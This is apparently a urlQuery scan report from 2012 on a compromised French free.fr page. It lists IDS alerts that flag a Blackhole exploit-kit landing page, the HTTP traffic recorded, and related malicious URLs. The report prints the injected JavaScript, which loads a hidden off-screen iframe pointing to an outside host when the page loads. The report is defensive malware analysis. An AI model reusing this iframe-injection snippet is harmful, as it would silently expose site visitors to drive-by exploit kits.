Overview

URLhttp://fousolitaire.free.fr/copyright-fr.htm
IP212.27.63.109
ASNAS12322 Free SAS
Location France
Report completed2012-11-06 07:09:35 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro
Timestamp Source IP Destination IP Severity Alert
2012-11-06 07:08:58 212.27.63.109 urlQuery Client1ET CURRENT_EVENTS c3284d Malware Network Compromised Redirect (comments 2)
2012-11-06 07:08:58 212.27.63.109 urlQuery Client1ET CURRENT_EVENTS Blackhole Landing Page Eval Variable Obfuscation 3
2012-11-06 07:09:00 74.53.143.237 urlQuery Client3FILEMAGIC Macromedia Flash data (compressed),
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2012-11-06 07:08:58 212.27.63.109 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch
2012-11-06 07:08:58 212.27.63.109 urlQuery Client1EXPLOIT-KIT Blackhole landing page with specific structure - prototype catch


Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 212.27.63.109

Date Alerts / IDS URL IP
2013-03-28 11:27:192 / 2http://78.brice.free.fr/bati.html212.27.63.109
2013-03-27 15:50:452 / 2http://78.brice.free.fr/bati.html212.27.63.109
2013-03-25 08:51:401 / 2http://mairaeva1.free.fr/spip.php?page=article_magic212.27.63.109
2013-03-24 22:05:521 / 2http://mairaeva1.free.fr/spip.php?page=article_magic&id_article=28212.27.63.109
2013-03-24 14:01:271 / 2http://mairaeva1.free.fr/spip.php?page=article_magic212.27.63.109
2013-03-23 23:29:441 / 2http://mairaeva1.free.fr/spip.php?page=article_magic&id_article=48212.27.63.109

Last 6 reports on ASN: AS12322 Free SAS

Date Alerts / IDS URL IP
2013-04-03 13:49:172 / 1http://sujet-du-bac.com/recherche.html?searchword=physique88.190.14.131
2013-04-03 13:04:000 / 2http://www.pepitotu-home.info/la-douche-non-censuree-de-nabila-amelie-0-66.html88.191.120.188
2013-04-03 12:56:120 / 3http://www.banque99shop.info/la-douche-non-censuree-de-nabila-amelie-0-66.html88.191.120.188
2013-04-03 11:10:140 / 2http://www.kastorsoft.com/dl/videoDownloaderSDK.exe88.190.16.23
2013-04-03 11:05:480 / 2http://neocity1.free.fr/animation_programme/faux_virus/f0024.exe212.27.63.115
2013-04-03 11:04:120 / 2http://olravet.free.fr/JardiLune.exe212.27.63.102



JavaScript

Executed Scripts (1)


Executed Evals (2)

#1 JavaScript::Eval (size: 291, repeated: 1) - Alert detect on script (Severity: 2)

function frmAdd() {
    var ifrm = document.createElement('iframe');
    ifrm.style.position = 'absolute';
    ifrm.style.top = '-999em';
    ifrm.style.left = '-999em';
    ifrm.src = "http://miamiheattickets.com/http.php";
    ifrm.id = 'frmId';
    document.body.appendChild(ifrm);
};
window.onload = frmAdd;

#2 JavaScript::Eval (size: 3, repeated: 291) 

j % 3

Executed Writes (0)



HTTP Transactions (10)


Request Response 
GET /copyright-fr.htm HTTP/1.1

Host: fousolitaire.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/html

Date: Tue, 06 Nov 2012 06:08:58 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Mon, 23 Jul 2012 06:14:12 GMT
Etag: "2cc951-861e-500cebb4"
Connection: close
Accept-Ranges: bytes
Content-Length: 34334
GET /favicon.ico HTTP/1.1

Host: fousolitaire.free.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: image/x-icon

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/ProXad [Apr 20 2012 15:06:05]
Last-Modified: Sat, 19 Jan 2008 07:05:34 GMT
Etag: "2c8b25-57e-4791a13e"
Connection: close
Accept-Ranges: bytes
Content-Length: 1406
GET /http.php HTTP/1.1

Host: miamiheattickets.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fousolitaire.free.fr/copyright-fr.htm
 
HTTP/1.1 404 Not Found

Content-Type: text/html

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache
Last-Modified: Tue, 10 Apr 2012 05:19:44 GMT
Accept-Ranges: bytes
Content-Length: 3354
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
GET /images/x.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899de-a70-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 2672
Connection: close
GET /images/404mid.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dc-78-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 120
Connection: close
GET /images/404bottom.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899d8-219-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 537
Connection: close
GET /images/gatorbottom.png HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/png

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Wed, 11 May 2011 20:45:00 GMT
Etag: "e3899df-1bae-4a306256eeb00"
Accept-Ranges: bytes
Content-Length: 7086
Connection: close
GET /images/404top.gif HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: image/gif

Date: Tue, 06 Nov 2012 06:08:59 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899dd-5299-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 21145
Connection: close
GET /images/hg728x90.swf?clickTAG=http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=page404 HTTP/1.1

Host: 74.53.143.237

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://miamiheattickets.com/http.php
 
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash

Date: Tue, 06 Nov 2012 06:09:00 GMT
Server: Apache/2.2.15 (CentOS)
Last-Modified: Mon, 12 Jul 2010 18:56:30 GMT
Etag: "e3899ca-a95c-48b354f7d9380"
Accept-Ranges: bytes
Content-Length: 43356
Connection: close
GET /get/flashplayer/update/current/xml/version_en_win_pl.xml HTTP/1.1

Host: fpdownload2.macromedia.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
 
HTTP/1.1 200 OK

Content-Type: text/xml

Server: Apache
Last-Modified: Wed, 03 Oct 2012 19:48:11 GMT
Etag: "289dff-26c-4cb2ceb2654c0"
Accept-Ranges: bytes
Content-Length: 620
Date: Tue, 06 Nov 2012 06:09:01 GMT
Connection: keep-alive